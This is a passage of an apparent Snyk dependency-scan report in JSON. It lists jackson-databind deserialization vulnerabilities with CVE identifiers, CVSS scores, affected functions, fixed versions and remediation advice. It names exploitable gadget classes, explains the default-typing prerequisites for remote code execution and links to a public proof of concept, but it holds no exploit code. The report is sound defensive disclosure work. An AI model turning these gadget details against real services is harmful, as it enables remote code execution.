enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.91508", + "probability": "0.03404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14061" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c2q3-4qrh-fm48" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T11:03:46.232208Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:59:39Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:45:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.565244Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.009523Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.45827", + "probability": "0.00116", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14439" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.478840Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:35.581531Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "className": "SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2814", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Kamimuka/cve-2020-24616-poc", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.282990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", + "epssDetails": { + "percentile": "0.85138", + "probability": "0.01172", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24616" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-08-26T11:28:06.617646Z", + "functions_new": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-08-26T11:26:14Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-08-26T14:27:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:47.311633Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2052", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.496040Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", + "epssDetails": { + "percentile": "0.81303", + "probability": "0.00770", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12022" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cjjf-94ff-43w7", + "GHSA-wrr7-33fx-rcvj" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:11:34.234921Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:00:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:00:03Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:36.643590Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2032", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:53.818908Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on 